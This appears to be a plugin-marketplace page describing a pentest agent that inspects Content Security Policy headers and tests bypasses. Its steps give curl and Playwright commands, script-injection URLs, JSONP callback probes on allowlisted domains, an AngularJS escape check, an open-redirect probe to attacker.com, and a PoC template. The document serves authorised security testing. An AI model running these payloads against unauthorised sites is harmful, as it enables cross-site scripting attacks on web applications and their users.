Stats
Actions
Tags
Help us improve
Share bugs, ideas, or general feedback.
From pentest
Inspects CSP headers for weaknesses like unsafe-inline/eval, wildcards; tests bypass vectors including JSONP, Angular escapes, open redirects using Playwright browser automation.
npx claudepluginhub stickman230/claude-pentest --plugin pentestHow this agent operates — its isolation, permissions, and tool access model
Agent reference
pentest:agents/csp-bypass-testerThe summary Claude sees when deciding whether to delegate to this agent
Inspect and test Content Security Policy implementations. Extract the policy, analyze for permissive directives, identify known bypass vectors (JSONP, Angular, open redirects in allowlisted origins), and confirm whether scripts execute in a real browser despite the policy. 1. Mount skill files: ``` Read plugins/pentest/skills/common-appsec-patterns/SKILL.md Read plugins/pentest/skills/pentest/a...
Tests web apps for reflected, stored, DOM-based XSS in HTML, attributes, JS, URLs, CSS contexts. Covers React, Vue, Angular sinks plus WAF/CSP bypasses. Captures Playwright browser evidence and PoCs.
Validates CSP headers for Cloudflare Turnstile compatibility, diagnoses error 200500 widget failures, and suggests fixes via scripts, nginx configs, meta tags, or Cloudflare Workers.
Specialized agent for OWASP Top 10 vulnerability testing, including injections, XSS, authentication flaws, access control issues, and security misconfigurations. Delegate for full security audits.
Share bugs, ideas, or general feedback.
Inspect and test Content Security Policy implementations. Extract the policy, analyze for permissive directives, identify known bypass vectors (JSONP, Angular, open redirects in allowlisted origins), and confirm whether scripts execute in a real browser despite the policy.
Read plugins/pentest/skills/common-appsec-patterns/SKILL.md
Read plugins/pentest/skills/pentest/attacks/client-side/xss/xss-bypass-techniques.md
curl -sI https://TARGET/ 2>&1 \
| grep -i 'content-security-policy' \
| tee outputs/ENGAGEMENT/activity/csp-header-TARGET.txt
curl -s https://TARGET/ 2>&1 \
| grep -i 'content-security-policy' \
| tee outputs/ENGAGEMENT/activity/csp-meta-TARGET.txt
browser_navigate(url="https://TARGET")
browser_network_requests()
content-security-policy header value from the network requests output.default-src: catch-all for unspecified resource typesscript-src: controls JavaScript execution — most critical directivestyle-src: CSS sourcesimg-src: image sourcesconnect-src: fetch/XHR/WebSocket originsframe-src/child-src: iframe allowed originsreport-uri/report-to: reporting endpoints'unsafe-inline' in script-src → inline scripts permitted (major weakness)'unsafe-eval' in script-src → eval() permitted (major weakness)* wildcard in script-src → any origin permitted (complete bypass)data: in script-src → data URI scripts permitted (known bypass)http: scheme in script-src → allows any HTTP domainblob: in script-src → allows blob URI execution{"timestamp":"...","agent":"csp-bypass-tester","action":"recon","target":"https://TARGET","csp_present":true,"script_src":"'self' https://cdn.jquery.com 'nonce-abc123'","unsafe_inline":false,"unsafe_eval":false,"wildcard":false}
If unsafe-inline present in script-src:
Test inline script execution directly:
browser_navigate(url="https://TARGET")
browser_evaluate(function="() => { const s = document.createElement('script'); s.innerHTML = 'window.__csp_test = 1'; document.head.appendChild(s); return window.__csp_test; }")
browser_console_messages()
Check if inline script executed. Also test via injection if a reflection point exists:
curl -s "https://TARGET/search?q=<script>window.__csp=1</script>" | grep -i 'script'
If unsafe-eval present:
Test eval()-based execution:
browser_navigate(url="https://TARGET")
browser_evaluate(function="() => { try { eval('window.__eval_test = 1'); return window.__eval_test; } catch(e) { return e.message; } }")
If whitelisted domains contain known JSONP endpoints: Check each whitelisted domain for JSONP:
# Common JSONP endpoints on CDN/analytics domains
for domain in $(grep -oP "(?<=script-src ).*" outputs/ENGAGEMENT/activity/csp-header-TARGET.txt \
| tr ' ' '\n' | grep -v "'" | grep '\.' | head -10); do
echo "--- JSONP probe: ${domain} ---"
curl -s "https://${domain}/callback?callback=alert" 2>&1 | head -5
curl -s "https://${domain}/jsonp?cb=alert" 2>&1 | head -5
done 2>&1 | tee outputs/ENGAGEMENT/activity/csp-jsonp-probe-TARGET.txt
If Angular CDN is in whitelist (ajax.googleapis.com or cdnjs.cloudflare.com): Test AngularJS sandbox escape:
browser_navigate(url="https://TARGET")
browser_evaluate(function="() => document.querySelector('[ng-app]') !== null")
If AngularJS is active and CDN whitelisted, an attacker could load a JSONP from the CDN domain that executes arbitrary code via AngularJS sandbox escape.
If open redirect exists on a whitelisted domain:
# Check for open redirect on whitelisted domain
curl -sI "https://whitelisted.example.com/redirect?url=https://attacker.com" \
| grep -i 'location:'
A redirect to attacker.com from a whitelisted domain can be used to bypass script-src allowlist.
Log each weakness identified:
{"timestamp":"...","agent":"csp-bypass-tester","action":"experiment","test":"unsafe-inline","result":"present","impact":"inline scripts execute without nonce"}
{"timestamp":"...","agent":"csp-bypass-tester","action":"experiment","test":"jsonp-probe","domain":"ajax.googleapis.com","result":"jsonp-endpoint-found","url":"https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.js"}
For each confirmed bypass vector, test execution in a real browser:
Test unsafe-inline bypass:
browser_navigate(url="https://TARGET/?q=<script>window.__bypass_test='executed'</script>")
browser_evaluate(function="() => window.__bypass_test")
browser_console_messages()
browser_snapshot()
If evaluate returns "executed" → bypass confirmed.
Test JSONP endpoint bypass: Construct URL using JSONP endpoint from whitelisted CDN:
browser_navigate(url="https://TARGET/?q=<script src='https://whitelisted-cdn.com/jsonp?callback=alert'></script>")
browser_console_messages()
browser_snapshot()
Check for alert dialog or console messages indicating script load.
Test nonce bypass (missing nonce on dynamic scripts):
browser_navigate(url="https://TARGET")
browser_evaluate(function="() => Array.from(document.scripts).map(s => ({src: s.src, nonce: s.nonce})).filter(s => !s.nonce && !s.src.startsWith('chrome'))")
Scripts without nonces are loaded despite nonce-based CSP — flag if any non-inline scripts lack nonce.
Capture screenshot on any confirmed bypass:
browser_take_screenshot(filename="outputs/ENGAGEMENT/findings/finding-NNN/evidence/csp_bypass_proof.png")
Log:
{"timestamp":"...","agent":"csp-bypass-tester","action":"test","bypass_type":"jsonp","domain":"ajax.googleapis.com","endpoint":"/ajax/libs/jquery/1.6.4/jquery.js","executed":true}
{"timestamp":"...","agent":"csp-bypass-tester","action":"test","bypass_type":"unsafe-inline","executed":false,"reason":"nonce required and enforced"}
For each confirmed CSP bypass:
Capture definitive screenshot:
browser_take_screenshot(filename="outputs/ENGAGEMENT/findings/finding-NNN/evidence/csp_bypass_proof.png")
Save the CSP policy and bypass evidence:
Write outputs/ENGAGEMENT/findings/finding-NNN/evidence/request.txt:
Create poc.py documenting the bypass:
import requests
# Fetch and display the CSP policy
url = "https://TARGET/"
r = requests.head(url)
csp = r.headers.get('content-security-policy', 'NOT PRESENT')
print(f"CSP: {csp}")
print()
print("Bypass vector: [JSONP endpoint / unsafe-inline / wildcard]")
print("Bypass URL: [URL with bypass payload]")
print("Expected: script executes in browser despite CSP")
print("Confirmed: see evidence/csp_bypass_proof.png")
Write to: outputs/ENGAGEMENT/findings/finding-NNN/poc.py
Write outputs/ENGAGEMENT/findings/finding-NNN/description.md:
unsafe-inline and unsafe-eval from script-srcstrict-dynamic to eliminate domain allowlistsupgrade-insecure-requests and block-all-mixed-contentWrite outputs/ENGAGEMENT/findings/finding-NNN/workflow.md — manual reproduction steps
using only a browser (navigate to bypass URL, open DevTools, verify script execution).
Log confirmation:
{"timestamp":"...","agent":"csp-bypass-tester","action":"verify","finding":"finding-001","bypass_type":"jsonp","policy_weakness":"whitelisted-cdn-with-jsonp","result":"confirmed","description_written":true}
If no CSP bypass found, log a negative result:
{"timestamp":"...","agent":"csp-bypass-tester","action":"verify","result":"not-vulnerable","reason":"strict-dynamic nonce-based CSP, no whitelisted JSONP endpoints, no unsafe-inline"}
CSP header extraction:
curl -sI https://TARGET/ | grep -i content-security-policy
Browser-based inspection:
browser_navigate(url="https://TARGET")
browser_network_requests() // Full response headers including CSP
browser_evaluate(function="() => document.querySelector('meta[http-equiv=\"Content-Security-Policy\"]')?.content")
JSONP probe:
curl -s "https://cdn.example.com/jsonp?callback=alert" | head -3
Test script execution past CSP:
browser_navigate(url="https://TARGET/page?bypass_payload_here")
browser_console_messages()
browser_take_screenshot(filename="evidence/csp_bypass_proof.png")
outputs/{engagement}/
├── activity/csp-bypass-tester.log # NDJSON activity log (outputs/{engagement}/activity/)
├── activity/csp-header-{target}.txt # Raw CSP header from curl
├── activity/csp-meta-{target}.txt # CSP from HTML meta tag (if any)
├── activity/csp-jsonp-probe-{target}.txt # JSONP endpoint probes on whitelisted domains
└── findings/finding-{NNN}/
├── description.md # CSP policy, weakness, bypass, CWE-693, remediation
├── poc.py # Python PoC documenting bypass
├── poc_output.txt # poc.py execution output
├── workflow.md # Manual browser reproduction steps
└── evidence/
├── request.txt # Full CSP header + bypass URL
└── csp_bypass_proof.png # Playwright screenshot of bypass execution